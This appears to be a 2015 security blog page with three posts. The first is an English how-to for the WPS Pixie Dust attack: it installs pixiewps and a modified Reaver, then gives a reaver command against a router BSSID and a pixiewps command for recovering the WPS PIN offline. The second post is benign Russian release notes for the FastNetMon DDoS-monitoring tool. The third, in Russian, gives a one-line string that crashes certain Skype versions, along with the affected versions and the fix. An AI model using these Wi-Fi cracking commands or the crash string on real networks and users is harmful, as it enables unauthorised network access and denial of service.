05.06.2015

WPS Pixie Dust Attack (Offline WPS Attack)




Tools:
-Pixiewps by Wiire, used to brute force the WPS pin offline

cd /path/to/pixiewps/src
make
make install

-t6_x's modified version of Reaver to automate the process

git clone https://github.com/t6x/reaver-wps-fork-t6x
cd /path/to/reaver-wps-fork-t6x/src
chmod 777 ./configure
./configure
make
make install

Compiling Dependencies:

apt-get install libssl-dev
apt-get install libpcap-dev
apt-get install libsqlite3-dev

reaver -i wlan0mon -b 10:FE:ED:B4:A0:D2 -a -vvv -K 1


If you would like to contribute data, please post in code tags:

N1 Enrollee Nonce:
N2 Registrar Nonce:
PKe:
PKr:
Authkey:
E-Hash1:
E-Hash2: 
AP Manufacturer:
AP Model Number:
AP Chipset:
Wikidevi Link:

pixiewps --pke <pke> --pkr <pkr> --e-hash1 <e-hash1> --e-hash2 <e-hash2> --authkey <authkey> --e-nonce <e-nonce>



04.06.2015

FastNetMon 1.1.2 мониторинг DoS/DDoS атак

FastNetMon

  • Возможность выявлять самые популярные виды атак: syn_flood, icmp_flood, udp_flood, ip_fragmentation_flood
  • Добавление поддержки протокола Netflow, поддерживаются 5, 9 и 10 (IPFIX) версии
  • Добавление поддержки протокола sFLOW v5, который поддерживается большинством современных сетевых коммутаторов
  • Добавлена поддержка использования netmap (поддерживаются Linux и FreeBSD, для Linux предоставляется специальная версия драйвера ixgbe: github.com/pavel-odintsov/ixgbe-linux-netmap) для захвата пакетов. Данный режим обеспечивает наивысшую производительность захвата трафика наряду с PF_RING ZC.
  • Добавлена поддержка PF_RING ZC (к сожалению, этот режим требует отдельной лицензии на библиотеку PF_RING)
Полный список изменений можно найти ниже:
  • Добавлена возможность сбора netflow на основе шаблонов с нескольких устройств (в том числе — виртуальных, в пределах одного шасси)
  • Базовая поддержка IPv6 в модуле Netflow, коллектор может прослушивать IPv6 интерфейс, анализ протокола пока не поддерживается
  • Информация об атаке теперь включает очень большое число полей, среди которых — используемые протоколы, типы пакетов, флаги TCP и многое другое, все это позволяет идентифицировать атаки максимально точно
  • Вместо ежесекундного расчета используется усреднение скорости атаки за Х последних секунд, что позволяет минимизировать ложные срабатывания
  • Добавлена возможность сохранения отпечатков атаки в отдельных файлах
  • Добавлена возможность указывать лимит с которого трафик считается атакой в числе потоков, пакетов/секунду и байт/секунду.
  • Добавлена интеграция с проектом ExaBGP, с помощью которого можно анонсировать блокируемые IP адреса непосредственно на BGP роутеры собственной сети либо напрямую аплинку
  • Добавлена поддержка плагинов, теперь возможна разработка собственных систем захвата трафика в дополнение к имеющимся
  • Добавлены init файлы для систем на базе systemd
  • Добавлена возможность разблокировки IP после истечения заданного периода времени
  • Добавлена возможность сохранения данных об атаке в Redis
  • Добавлена поддержка распаковки протокола L2TP в режиме захвата с зеркальных портов

Со стороны разработки были осуществлены следующие изменения:
  • Осуществлен переход на систему сборки cmake
  • Добавлена интеграция CI системы Travis CI
  • По соображениям переносимости осуществлен отказ от использования функционала С++ 11

Список поддерживаемых платформ претерпел огромные изменения, добавлена поддержка следующих систем:

  • Fedora 21
  • Debian 6, 7, 8
  • CentOS 6, 7
  • FreeBSD 9, 10, 11
  • DragonflyBSD 4
  • MacOS X 10.10

Для следующих систем были собраны бинарные пакеты:
Для других Linux систем рекомендуется использовать автоматический установщик.

Новая версия позволяет достичь очень высокой производительности. Скорость обработки sFLOW/Netflow почти неограниченная (до десятков и сотен гигабит секунду). Для режима PF_RING (не ZC) максимально достигнутая скорость в районе ~3mpps/5GE. Наивысшей скорости можно добиться используя системы захвата трафика PF_RING ZC или netmap, обе библиотеки позволяют обрабатывать до 10 и более миллионов пакетов в секунду на зеркальных портах (10GE+). Обращаю внимание, что при очень высокой скорости рекомендуется отключать режим трекинга соединений, который очень сильно нагружает процессорные ресурсы. Все измерения приведены для Intel i7 2600 и сетевой карты Intel 82599.

Из вещей касающихся сообщества разработки стоит отметить подключение проекта Gitter для эффективного обсуждения вопросов, касающихся проекта и в дополнение к нему добавлен классический список рассылки.

Отдельно мы бы хотели поблагодарить людей внесших большой вклад в помощь проекту и в первую очередь компаниюFastVPS, без которой данный проект был бы невозможен!

DoS эксплойт десктопного Skype для Windows и Mac OS

В последних версиях Skype для Windows и Mac OS X и присутствует ошибка, позволяющая безвозвратно обрушить программу.

Для этого достаточно отправить в чате строку:

http://:

Работает как в групповых чатах, так и в приватных.

Уязвимые версии:
для Windows: 7.5.0.101
для Mac OS X: 7.8 (390)

Более старые версии Skype, например Windows 7.3.0.101 и Mac OS 7.7 (335) не подвержены проблеме. В качестве временного решения можно откатиться на более старую версию.

UPDATE: Проблема исправлена в версии 7.5.64.102 для Windows и 7.8 (391) для Mac OS.
Для лечения проблемы просто скачайте последнюю версию со skype.com